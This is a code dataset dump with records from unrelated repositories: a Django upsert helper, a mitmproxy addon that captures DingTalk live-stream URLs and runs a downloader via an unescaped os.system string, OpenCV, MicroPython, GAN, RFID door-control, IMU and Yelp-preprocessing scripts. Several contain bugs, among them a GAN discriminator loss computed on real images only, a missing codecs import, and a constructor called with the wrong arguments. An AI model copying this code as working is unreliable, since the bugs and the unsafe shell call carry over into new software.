----------\n model_class : django.db.models.Model\n model to update_or_create\n model_data : list\n data to update/create. Example: [{'field1': 'value', 'field2': 'value'}, ...]\n comparator_fn: function\n a function that compares a model instance w/ model data to determine if it needs to be updated\n Returns\n -------\n tuple\n the number of objects created & updated\n \"\"\"\n\n # get all instances of the model...\n existing_objects = list(model_class.objects.all())\n\n # get all the fields that uniquely identify a model object...\n # TODO: deal w/ unique_together fields\n unique_field_names = [\n field.name for field in model_class._meta.get_fields()\n if field.concrete and not field.primary_key and field.unique\n ]\n all_data_record_field_names = set()\n\n objects_to_create = []\n objects_to_update = []\n\n for data_record in model_data:\n\n # for every dictionary in model_data,\n # extract the fields that can uniquely identify an object,\n # and check if there is an existing object w/ those values,\n # if so (and if the comparator_fn fails) update that object w/ the field values and store it to be UPDATED,\n # then remove it from the list of existing objects (so the next time around the check is faster),\n # if not store it to be CREATED\n\n all_data_record_field_names.update(data_record.keys())\n unique_data_record_fields = {\n # raises a KeyError if data doesn't include unique_fields\n field_name: data_record[field_name]\n for field_name in unique_field_names\n }\n\n matching_object = next(\n (\n obj for obj in existing_objects if all([\n getattr(obj, k) == v for k,\n v in unique_data_record_fields.items()\n ])\n ),\n None,\n )\n if matching_object:\n if comparator_fn is None or not comparator_fn(\n matching_object, data_record\n ):\n for k, v in data_record.items():\n setattr(matching_object, k, v() if callable(v) else v)\n objects_to_update.append(matching_object)\n existing_objects.remove(matching_object)\n else:\n objects_to_create.append(model_class(**data_record))\n\n all_data_record_field_names.remove(*unique_field_names)\n\n model_class.objects.bulk_create(objects_to_create)\n model_class.objects.bulk_update(\n objects_to_update, all_data_record_field_names\n )\n\n # returns a tuple of created objects & updated objects\n return (objects_to_create, objects_to_update)\n", "repo_name": "astrosat/django-astrosat-core", "sub_path": "astrosat/utils/utils_db.py", "file_name": "utils_db.py", "file_ext": "py", "file_size_in_byte": 3829, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.models.CASCADE", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "5884707163", "text": "import mitmproxy.http\nimport re\nimport os\nimport tempfile\nif os.name==\"nt\":\n executefile=\"n-m3u8dl-re.exe\"\nelse:\n executefile=\"n-m3u8dl-re\"\ndef response(flow:mitmproxy.http.HTTPFlow):\n #如果域名匹配\"dtliving-*.dingtalk.com\"\n if flow.request.method==\"GET\" and re.match(r'dtliving-.+\\.dingtalk\\.com',flow.request.host) and re.match(\n r\"/live_hp/([a-zA-Z0-9-]+)_normal\\.m3u8\\?auth_key=([a-zA-Z0-9-]+)\",flow.request.path):\n #将内容写入到tempfile获取的临时文件地址,每次覆盖写入,如果文件不存在则创建\n tmpfile_path=tempfile.mkstemp(\".m3u8\",\"dingtalk-live-downloader\")[1]\n with open(tmpfile_path,\"w+\") as f:\n f.write(flow.response.content.decode(\"utf-8\"))\n #调用n-m3u8dl-re-bin下载。\n os.system(executefile+r\" \"+tmpfile_path+\" --base-url https://\"+flow.request.host+r\"/live_hp/ --save-dir . --save-name \"+re.match(\n r\"/live_hp/([a-zA-Z0-9-]+)_normal\\.m3u8\\?auth_key=([a-zA-Z0-9-]+)\",flow.request.path).group(1)+r\".mp4 --no-log \")\n #删除临时文件\n os.remove(tmpfile_path)", "repo_name": "chinese-wzq/dingtalk-live-downloader", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1108, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.name", "line_number": 5, "usage_type": "attribute"}, {"api_name": "mitmproxy.http.http", "line_number": 9, "usage_type": "attribute"}, {"api_name": "mitmproxy.http", "line_number": 9, "usage_type": "name"}, {"api_name": "re.match", "line_number": 11, "usage_type": "call"}, {"api_name": "tempfile.mkstemp", "line_number": 14, "usage_type": "call"}, {"api_name": "os.system", "line_number": 18, "usage_type": "call"}, {"api_name": "re.match", "line_number": 18, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "32764228185", "text": "# Personal Test Number 1\n# Many of these examples have left me wanting sliders to manipulate parameters\n# in realtime. OpenCV has a module for just such a feature.\n# My first personal test is to create a small program that implements two track-\n# bar sliders which affect the first and second thresholds in Canny detection.\n\nimport cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\nwindow = 'Variable Canny'\nthresh1 = 0\nthresh2 = 0\nthreshMax = 500\n\ndef slideOne(val):\n global thresh1\n thresh1 = val\n\ndef slideTwo(val):\n global thresh2\n thresh2 = val\n\ncv2.namedWindow(window)\n\ncv2.createTrackbar('Thresh1', window, 0, threshMax, slideOne)\ncv2.createTrackbar('Thresh2', window, 0, threshMax, slideTwo)\n\nwhile(1):\n _, frame = cap.read()\n\n canny = cv2.Canny(frame, thresh1, thresh2)\n cv2.imshow(window, canny)\n k = cv2.waitKey(5) & 0xFF\n if k==27:\n break\n\ncv2.destroyAllWindows()\ncap.release()\n", "repo_name": "sosatchley/Explorations_OpenCV", "sub_path": "Tests/Test01.py", "file_name": "Test01.py", "file_ext": "py", "file_size_in_byte": 928, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.VideoCapture", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.createTrackbar", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.Canny", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "857148269", "text": "from os import listdir\nimport random\nimport sys\nimport machine\nimport ubinascii\nfrom Enviroment import Enviroment\nfrom utils.Logger import Logger\n\nclass __Device: \n def __init__(self):\n if not hasattr(machine, \"unique_id\"):\n raise(OSError(\"Unable to detect hardware id\"))\n\n @property\n def serial_no(self):\n return ubinascii.b2a_base64(machine.unique_id())\n\n def soft_reset(self):\n sys.exit()\n\n def hard_reset(self):\n machine.reset()\n \n async def update(self): \n \"\"\"\n Attempt to assign the LED pin id's, if invalid_pin, ignore the pin otherwise set to update queue\n if any pins have been loaded, update pin state using pin callback.\n \"\"\"\n pins = []\n setters = [(Enviroment.WIFI_LED_PIN, lambda pin: pin.value(int(Wifi.wifi_connected))), (Enviroment.ADHOC_LED_PIN, lambda pin: pin.value(int(Wifi.adhoc_ip_adress is not None)))]\n for id, callback in setters:\n newVal = None\n try:\n newVal = (machine.Pin(id, machine.Pin.OUT), callback)\n except ValueError as e:\n if e.errno == \"invalid pin\":\n if id == Enviroment.WIFI_LED_PIN:\n Logger.error(self, \"Failed to setup wifi led pin: (Invalid enviroment -> WIFI_LED_PIN value)\")\n elif id == Enviroment.ADHOC_LED_PIN:\n Logger.error(self, \"Failed to setup adhoc led pin: (Invalid enviroment -> ADHOC_LED_PIN value)\")\n elif Enviroment.DEBUG_MODE:\n raise(e)\n finally: \n if newVal is not None:\n pins.append(newVal)\n \n del(setters) # Remove setter stack, possibly chugs up memory due occasional infinite loop\n while len(pins):\n for pin, callback in pins:\n callback(pin)\n \n await uasyncio.sleep_ms(1000)\n \n\nDevice = __Device()", "repo_name": "SlimmiiProject/MicroProcessorController", "sub_path": "Python (deprecated)/utils/Device.py", "file_name": "Device.py", "file_ext": "py", "file_size_in_byte": 1993, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "ubinascii.b2a_base64", "line_number": 16, "usage_type": "call"}, {"api_name": "machine.unique_id", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 19, "usage_type": "call"}, {"api_name": "machine.reset", "line_number": 22, "usage_type": "call"}, {"api_name": "Enviroment.Enviroment.WIFI_LED_PIN", "line_number": 30, "usage_type": "attribute"}, {"api_name": "Enviroment.Enviroment", "line_number": 30, "usage_type": "name"}, {"api_name": "Enviroment.Enviroment.ADHOC_LED_PIN", "line_number": 30, "usage_type": "attribute"}, {"api_name": "machine.Pin", "line_number": 34, "usage_type": "call"}, {"api_name": "Enviroment.Enviroment.WIFI_LED_PIN", "line_number": 37, "usage_type": "attribute"}, {"api_name": "Enviroment.Enviroment", "line_number": 37, "usage_type": "name"}, {"api_name": "utils.Logger.Logger.error", "line_number": 38, "usage_type": "call"}, {"api_name": "utils.Logger.Logger", "line_number": 38, "usage_type": "name"}, {"api_name": "Enviroment.Enviroment.ADHOC_LED_PIN", "line_number": 39, "usage_type": "attribute"}, {"api_name": "Enviroment.Enviroment", "line_number": 39, "usage_type": "name"}, {"api_name": "utils.Logger.Logger.error", "line_number": 40, "usage_type": "call"}, {"api_name": "utils.Logger.Logger", "line_number": 40, "usage_type": "name"}, {"api_name": "Enviroment.Enviroment.DEBUG_MODE", "line_number": 41, "usage_type": "attribute"}, {"api_name": "Enviroment.Enviroment", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "10702155529", "text": "#!/home/rafael/anaconda3/bin/python\n\nimport argparse\nimport os\nimport math\nimport numpy as np\nimport liveplot as lp\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.transforms as transforms\nimport tqdm\n\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torchvision.utils import save_image\n\nos.makedirs(\"images\", exist_ok=True)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--n_epochs\", type=int, default=200, help=\"number of epochs of training\")\nparser.add_argument(\"--batch_size\", type=int, default=64, help=\"size of the batches\")\nparser.add_argument(\"--lr\", type=float, default=0.0002, help=\"adam: learning rate\")\nparser.add_argument(\"--b1\", type=float, default=0.5, help=\"adam: decay of first order momentum of gradient\")\nparser.add_argument(\"--b2\", type=float, default=0.999, help=\"adam: decay of first order momentum of gradient\")\nparser.add_argument(\"--n_cpu\", type=int, default=8, help=\"number of cpu threads to use during batch generation\")\nparser.add_argument(\"--latent_dim\", type=int, default=100, help=\"dimensionality of the latent space\")\nparser.add_argument(\"--img_size\", type=int, default=28, help=\"size of each image dimension\")\nparser.add_argument(\"--channels\", type=int, default=1, help=\"number of image channels\")\nparser.add_argument(\"--sample_interval\", type=int, default=400, help=\"interval betwen image samples\")\nopt = parser.parse_args()\nprint(opt)\n\nimg_shape = (opt.channels, opt.img_size, opt.img_size)\n\ncuda = True if torch.cuda.is_available() else False\n\nclass Generator(nn.Module):\n def __init__(self):\n super(Generator, self).__init__()\n\n def block(in_feat, out_feat, normalize=True):\n layers = [ nn.Linear(in_feat, out_feat) ]\n if normalize: \n layers.append(nn.BatchNorm1d(out_feat, 0.8))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n self.model = nn.Sequential(\n *block(opt.latent_dim, 128, normalize=False),\n *block(128, 256),\n *block(256, 512),\n *block(512, 1024),\n nn.Linear(1024, int(np.prod(img_shape))),\n nn.Tanh()\n )\n\n def forward(self, z):\n img = self.model(z)\n img = img.view(img.size(0), *img_shape)\n return img\n\nclass Discriminator(nn.Module):\n def __init__(self):\n super(Discriminator, self).__init__()\n\n self.model = nn.Sequential(\n nn.Linear(int(np.prod(img_shape)), 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, 1),\n nn.Sigmoid(),\n )\n\n def forward(self, img):\n img_flat = img.view(img.size(0), -1)\n validity = self.model(img_flat)\n return validity\n\nadversarial_loss = torch.nn.BCELoss()\n\ngenerator = Generator()\ndiscriminator = Discriminator()\n\nif cuda:\n generator.cuda()\n discriminator.cuda()\n adversarial_loss.cuda()\n\nos.makedirs(\"data/mnist\", exist_ok=True)\ndataloader = torch.utils.data.DataLoader(\n datasets.MNIST(\"data/mnist\",\n train=True,\n download=True,\n transform=transforms.Compose(\n [transforms.Resize(opt.img_size), transforms.ToTensor(), transforms.Normalize([0.5], [0.5])]\n ),\n ),\n batch_size=opt.batch_size,\n shuffle=True,\n)\n\noptimizer_G = torch.optim.Adam(generator.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2))\noptimizer_D = torch.optim.Adam(discriminator.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2))\n\nTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\n\nD_hist = []\nG_hist = []\n\nbound_min = ( 1, -1)\nbound_max = (-1, -1)\n\nplot = lp.LivePlot((800, 600))\n\ndef lerp(v0, v1, t):\n return v0 + t * (v1 - v0)\n\netqdm = tqdm.trange(opt.n_epochs)\nfor epoch in etqdm:\n btqdm = tqdm.tqdm(enumerate(dataloader), total=len(dataloader))\n for i, (imgs, _) in btqdm:\n valid = Variable(Tensor(imgs.size(0), 1).fill_(1.), requires_grad=False)\n fake = Variable(Tensor(imgs.size(0), 1).fill_(0.), requires_grad=False)\n\n real_imgs = Variable(imgs.type(Tensor))\n\n optimizer_G.zero_grad()\n z = Variable(Tensor(np.random.normal(0, 1, (imgs.shape[0], opt.latent_dim))))\n gen_imgs = generator(z)\n g_loss = adversarial_loss(discriminator(gen_imgs), valid)\n g_loss.backward()\n optimizer_G.step()\n\n optimizer_D.zero_grad()\n real_loss = adversarial_loss(discriminator(real_imgs), valid)\n fake_loss = adversarial_loss(discriminator(real_imgs), fake)\n d_loss = (real_loss + fake_loss) / 2\n d_loss.backward()\n optimizer_D.step()\n\n G_hist.append(g_loss.item())\n G_hist = G_hist[-800:]\n\n D_hist.append(d_loss.item())\n D_hist = D_hist[-800:]\n\n it = epoch * len(dataloader) + i\n mn = min(g_loss.item(), d_loss.item())\n mx = max(g_loss.item(), d_loss.item())\n\n local_min = min(np.min(G_hist), np.min(D_hist))\n local_min = lerp(bound_min[0], local_min, (it - bound_min[1]) / 8000)\n\n local_max = max(np.max(G_hist), np.max(D_hist))\n local_max = lerp(bound_max[0], local_max, (it - bound_max[1]) / 8000)\n\n if mn < local_min:\n bound_min = (mn, it)\n\n if mx > local_max:\n bound_max = (mx, it)\n\n if not plot.update([ D_hist, G_hist ], (local_min * 0.9, local_max * 1.05)):\n raise EarlyStop()\n\n btqdm.set_postfix({\n \"D loss\": d_loss.item(),\n \"G loss\": g_loss.item()\n })\n\n batches_done = epoch * len(dataloader) + i\n if batches_done % opt.sample_interval == 0:\n save_image(gen_imgs.data[:25], \"images{}.png\".format(batches_done), nrow=5, normalize=True)\n\n\n\n", "repo_name": "rgd-ul-2020/public", "sub_path": "code/misc/machine_learning/main_torch.py", "file_name": "main_torch.py", "file_ext": "py", "file_size_in_byte": 5862, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.makedirs", "line_number": 20, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.prod", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn.Tanh", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "numpy.prod", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.BCELoss", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 95, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 95, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 98, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 98, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 99, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 99, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 99, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 106, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 107, "usage_type": "attribute"}, {"api_name": "torch.cuda", "line_number": 109, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 109, "usage_type": "attribute"}, {"api_name": "liveplot.LivePlot", "line_number": 117, "usage_type": "call"}, {"api_name": "tqdm.trange", "line_number": 122, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 132, "usage_type": "attribute"}, {"api_name": "numpy.min", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 158, "usage_type": "call"}, {"api_name": "torchvision.utils.save_image", "line_number": 177, "usage_type": "call"}]} +{"seq_id": "29923577338", "text": "import logging, datetime\nfrom time import sleep\nimport threading, traceback\n\n\ndoor_controller_mutex = threading.Lock()\nevent_log_mutex = threading.Lock()\n\nlogger = logging.getLogger('Controller')\n\nclass Event():\n @staticmethod\n def get_time():\n return datetime.datetime.now()\n\n class Id_Read():\n def __init__(self, id):\n self.id = id\n self.timestamp = Event.get_time()\n\n class Id_Access_Accepted():\n def __init__(self, id, server_positive_reply):\n self.id = id\n self.timestamp = Event.get_time()\n self.server_reply = server_positive_reply\n\n class Id_Access_Rejected():\n def __init__(self, id, server_negative_reply):\n self.id = id\n self.timestamp = Event.get_time()\n self.server_reply = server_negative_reply\n\n class Server_Timeout():\n def __init__(self, id, ):\n self.id = id\n self.timestamp = Event.get_time()\n\n class Id_Allowed_In_Disconnect_State():\n pass\n\n class Id_Read_While_Busy():\n def __init__(self, id):\n self.id = id\n self.timestamp = Event.get_time()\n\nclass Event_Recorder():\n def __init__(self):\n self.events = []\n def record(self, event):\n self.events.append(event)\n\n\nclass Controller:\n def __init__(self):\n self.communication = None\n self.lock = None\n self.reader = None\n\n self.event_recorder = Event_Recorder()\n\n def add_event(self, event):\n event_log_mutex.acquire(True) #blocking acquire\n try:\n self.event_recorder.events.append(event)\n finally:\n event_log_mutex.release()\n\n def log_events(self):\n pass\n\n def save_offline_access(self):\n pass\n\n def load_offline_access(self):\n pass\n\n #this method gets called (async) by the reader every time a card is read\n def read(self, id):\n try:\n #a mutex because we only want to process one read card at a time\n if door_controller_mutex.acquire(False): #non-blocking acquire\n try:\n logger.debug(\"ID {id} was read: processing\".format(**locals()))\n self.add_event(Event.Id_Read(id))\n\n # we ask the server if we should open the door for the id - if the server timeouts, we open it anyways and log that fact\n permission_request = self.communication.get_permission(id)\n\n if permission_request.valid:\n if permission_request.allow:\n self.add_event(Event.Id_Access_Accepted(id, permission_request))\n self.lock.open()\n else:\n self.add_event(Event.Id_Access_Rejected(id, permission_request))\n else:\n self.add_event(Event.Id_Allowed_In_Disconnect_State(id, permission_request))\n self.lock.open()\n\n finally:\n door_controller_mutex.release()\n else:\n self.add_event(Event.Id_Read_While_Busy(id))\n logger.debug(\"ID {id} was read but an earlier read is being processed\".format(**locals()))\n\n except Exception as e:\n trace_stack = traceback.format_exc()\n logger.critical(\"Unrecoverable error has occurred: {0}\".format(str(e)))\n logger.critical(\"{0}\".format(trace_stack))\n\n", "repo_name": "heliosmakerspace/accessctl", "sub_path": "access_control_rfid_agent/rfid_client/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 3517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "threading.Lock", "line_number": 6, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 7, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "attribute"}, {"api_name": "traceback.format_exc", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "3067919300", "text": "import serial\nimport csv\nimport time\n\n# Initialize serial connection (this is an example, adjust for your IMU and connection)\nData = serial.Serial()\nData.baudrate = 19200\nData.port = '/dev/tty.usbmodem1101'\nData.timeout = 1\nData.open()\n\ndef dataProcess(data):\n data = str(data)\n dataSet = []\n datapoint = ''\n for i in data:\n if i.isdigit() or i == '-':\n datapoint += i\n elif i == \",\" and canFloat(datapoint):\n dataSet.append(float(datapoint))\n datapoint = ''\n return dataSet\n\ndef canFloat(data):\n try:\n float(data)\n return True\n except:\n return False\n# Function to read data from IMU\ndef read_imu_data():\n # if ser.in_waiting:\n line = Data.readline()\n # Parse the line into respective data fields\n # This will depend on the format of the data coming from the IMU\n data = dataProcess(line)\n return data\n # return None\n\n\nfor i in range(10):\n # Collect data\n data_list = []\n start_time = time.time()\n print(f\"Move{i}\")\n while len(data_list) <= 90:\n elapsed_time = time.time() - start_time\n # Ensure that we are collecting data over exactly 3 seconds\n data = read_imu_data()\n # print(data)\n if data:\n data_list.append(data)\n\n start_point = 151\n # Write to CSV file\n with open(f'data/imu_data_{start_point+i}.csv', 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['ax', 'ay', 'az', 'gx', 'gy', 'gz', 'row', 'pitch']) # Replace with your actual labels\n writer.writerows(data_list)\n\n with open(f'label/imu_label_{start_point+i}.csv', 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerow(['label']) # Replace with your actual labels\n writer.writerow(['3'])", "repo_name": "GreatEugenius/InfinityDie", "sub_path": "DataAndModel/read_write_imu.py", "file_name": "read_write_imu.py", "file_ext": "py", "file_size_in_byte": 1814, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "serial.Serial", "line_number": 6, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 47, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 57, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "26547759242", "text": "\"\"\"\nDataset proprocessing.\nAuthor: Ying Xu\nDate: Jul 8, 2020\n\"\"\"\n\nfrom __future__ import unicode_literals\nfrom argparse import ArgumentParser\n\nimport json\nfrom tqdm import tqdm\nfrom collections import Counter\nimport spacy\nnlp = spacy.blank(\"en\")\nGLOVE_WORD_SIZE = int(2.2e6)\nCF_WORD_SIZE = 65713\n\nparser = ArgumentParser()\nparser.add_argument('--data_dir', default='/Users/yxu132/Downloads/yelp_dataset', type=str, help='path to DATA_DIR')\nparser.add_argument('--embed_file', default='/Users/yxu132/pub-repos/decaNLP/embeddings/glove.840B.300d.txt', type=str, help='path to glove embeding file')\nparser.add_argument('--para_limit', default=50, type=int, help='maximum number of words for each paragraph')\nargs = parser.parse_args()\n\ndef parse_json():\n texts = []\n ratings = []\n for line in open(args.data_dir+'/yelp_academic_dataset_review.json', 'r'):\n # for line in open(args.data_dir + '/sample.json', 'r'):\n example = json.loads(line)\n texts.append(example['text'].replace('\\n', ' ').replace('\\r', ''))\n ratings.append(example['stars'])\n with open(args.data_dir+'/yelp_review.full', 'w') as output_file:\n output_file.write('\\n'.join(texts))\n with open(args.data_dir+'/yelp_review.ratings', 'w') as output_file:\n output_file.write('\\n'.join([str(rating) for rating in ratings]))\n\ndef readLinesList(filename):\n ret = []\n for line in open(filename, 'r'):\n ret.append(line.strip())\n return ret\n\ndef read_lines():\n ret = []\n labels = readLinesList(args.data_dir+'/yelp_review.ratings')\n for ind, line in tqdm(enumerate(open(args.data_dir+'/yelp_review.full', 'r'))):\n line = line.strip().lower()\n line = line.replace('\\\\n', ' ').replace('\\\\', '')\n line = line.replace('(', ' (').replace(')', ') ')\n line = line.replace('!', '! ')\n line = ' '.join(line.split())\n example = {}\n example['text'] = line\n example['label'] = labels[ind]\n ret.append(example)\n return ret\n\ndef get_tokenize(sent):\n sent = sent.replace(\n \"''\", '\" ').replace(\"``\", '\" ')\n doc = nlp(sent)\n context_tokens = [token.text for token in doc]\n new_sent = ' '.join(context_tokens)\n return new_sent, context_tokens\n\ndef tokenize_sentences(sentences, para_limit=None):\n print('Tokenize input sentences...')\n word_counter = Counter()\n context_list, context_tokens_list = [], []\n labels = []\n for sentence in tqdm(sentences):\n context, context_tokens = get_tokenize(sentence['text'])\n if len(context_tokens) > para_limit:\n continue\n for token in context_tokens:\n word_counter[token] += 1\n context_list.append(context)\n context_tokens_list.append(context_tokens)\n labels.append(sentence['label'])\n return context_list, context_tokens_list, labels, word_counter\n\ndef filter_against_embedding(sentences, counter, emb_file, limit=-1,\n size=GLOVE_WORD_SIZE, vec_size=300):\n\n embedding_dict = {}\n filtered_elements = [k for k, v in counter.items() if v > limit]\n assert size is not None\n assert vec_size is not None\n with codecs.open(emb_file, \"r\", \"utf-8\") as fh:\n for line in tqdm(fh, total=size):\n array = line.split()\n word = \"\".join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n if word in counter and counter[word] > limit:\n embedding_dict[word] = vector\n print(\"{} / {} tokens have corresponding embedding vector\".format(\n len(embedding_dict), len(filtered_elements)))\n\n embedding_tokens = set(embedding_dict.keys())\n filtered_sentences = []\n for sentence in sentences:\n tokens = sentence['text'].split()\n if len(set(tokens) - embedding_tokens) > 0:\n continue\n filtered_sentences.append(sentence)\n\n return filtered_sentences, embedding_dict\n\ndef writeLines(llist, output_file):\n with codecs.open(output_file, \"w\", \"utf-8\") as output:\n output.write('\\n'.join(llist))\n\ndef get_embedding(counter, data_type, emb_file, limit=-1, size=None, vec_size=None):\n print(\"Generating {} embedding...\".format(data_type))\n embedding_dict = {}\n\n filtered_elements = [k for k, v in counter.items() if v > limit]\n assert size is not None\n assert vec_size is not None\n with codecs.open(emb_file, \"r\", \"utf-8\") as fh:\n for line in tqdm(fh, total=size):\n array = line.split()\n word = \"\".join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n if word in counter and counter[word] > limit:\n embedding_dict[word] = vector\n missing_words = set(filtered_elements) - set(embedding_dict.keys())\n print('\\n'.join(missing_words))\n\n print(\"{} / {} tokens have corresponding {} embedding vector\".format(\n len(embedding_dict), len(filtered_elements), data_type))\n\n token2idx_dict = {token: idx for idx,\n token in enumerate(embedding_dict.keys(), 0)}\n\n idx2emb_dict = {idx: embedding_dict[token]\n for token, idx in token2idx_dict.items()}\n emb_mat = [idx2emb_dict[idx] for idx in range(len(idx2emb_dict))]\n return emb_mat, token2idx_dict\n\ndef embed_sentences(word_counter, word_emb_file):\n word_emb_mat, word2idx_dict = get_embedding(\n word_counter, \"word\", emb_file=word_emb_file, size=GLOVE_WORD_SIZE, vec_size=300)\n return word_emb_mat, word2idx_dict\n\ndef save(filename, obj, message=None):\n if message is not None:\n print(\"Saving {}...\".format(message))\n with open(filename, \"w\") as fh:\n json.dump(obj, fh)\n\nimport numpy as np\ndef process():\n\n print(\"Step 2.1: Tokenize sentences...\")\n sentences = read_lines()\n context_list, context_tokens_list, labels, 